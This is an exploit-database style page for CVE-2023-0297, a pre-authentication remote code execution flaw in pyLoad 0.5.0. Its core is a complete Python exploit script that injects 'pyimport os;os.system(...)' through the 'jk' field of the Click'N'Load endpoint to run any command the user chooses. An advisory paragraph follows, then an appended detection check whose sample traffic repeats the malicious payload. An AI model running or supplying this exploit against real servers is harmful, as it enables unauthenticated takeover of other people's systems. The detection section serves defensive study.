PyLoad 0.5.0 Remote Code Execution
PyLoad version 0.5.0 suffers from an unauthenticated remote code execution vulnerability.
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297

import sys
import requests, argparse

parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()

def doRequest(url):
    # Liveness check: any HTTP 200 from the base URL counts as "up".
    try:
        res = requests.get(url)
        if res.status_code == 200:
            return True
        else:
            return False
    except requests.exceptions.RequestException as e:
        print("[!] Maybe the host is offline :", e)
        sys.exit(1)

def runExploit(url, cmd):
    # The Click'N'Load endpoint evaluates the "jk" form field as JavaScript via js2py;
    # js2py's pyimport extension is what lets that JavaScript reach Python's os module.
    endpoint = url + '/flash/addcrypted2'
    if " " in cmd:
        validCommand = cmd.replace(" ", "%20")
    else:
        validCommand = cmd
    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'}, data=payload)
    print('[+] The exploit has been executed on the target machine. ')

def main(targetUrl, Command):
    print('[+] Check if target host is alive: ' + targetUrl)
    alive = doRequest(targetUrl)
    if alive:
        print("[+] Host up, let's exploit! ")
        runExploit(targetUrl, Command)
    else:
        print('[-] Host down! ')

if arguments.url is not None and arguments.cmd is not None:
    targetUrl = arguments.url
    Command = arguments.cmd
    main(targetUrl, Command)
pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which is on port 8000 and cannot be used by external hosts. A secondary Click'N'Load service runs on port 9666 and can be used remotely without authentication.
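The following is an added detection check, written for this page and not part of the advisory or of pyLoad's own code. It parses a request to the Click'N'Load endpoint the way the server would (form-decoding the body) and flags a "jk" field that carries js2py's Python bridge instead of a plain JavaScript key function; the sample request bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Click'N'Load endpoint whose "jk" form field is evaluated as JavaScript by js2py.
CNL_ENDPOINT = "/flash/addcrypted2"

# Tokens that never belong in a legitimate Click'N'Load key function.
# "pyimport" is the js2py extension that exposes Python modules to the JavaScript.
SUSPICIOUS = re.compile(r"\b(pyimport|os\.system|subprocess|__import__)\b")


def inspect_cnl_request(path: str, body: str) -> dict:
    """Classify one HTTP request to the Click'N'Load service.

    Returns {'jk': <decoded JavaScript that would be evaluated>, 'alert': <bool>}.
    parse_qs URL-decodes the body, so %20-encoded payloads are resolved before matching,
    and the stray empty pair produced by '&&' is skipped.
    """
    if path != CNL_ENDPOINT:
        return {"jk": None, "alert": False}
    fields = parse_qs(body, keep_blank_values=True)
    jk = fields.get("jk", [""])[0]
    return {"jk": jk, "alert": bool(SUSPICIOUS.search(jk))}


# Constructed sample traffic (path, form body); not captured from a real system.
SAMPLES = [
    # Benign: an ordinary Click'N'Load key function
    ("/flash/addcrypted2",
     "jk=function%20f(){return%20%2741%27};&package=x&crypted=AAAA&passwords=a"),
    # Malicious: the pyimport pattern this advisory describes
    ("/flash/addcrypted2",
     'jk=pyimport%20os;os.system("id");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'),
    # Unrelated request to another path
    ("/", "ping=1"),
]


def count_alerts(samples=SAMPLES) -> int:
    """Number of sample requests the check would flag."""
    return sum(inspect_cnl_request(path, body)["alert"] for path, body in samples)


if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, inspect_cnl_request(path, body))
```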
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.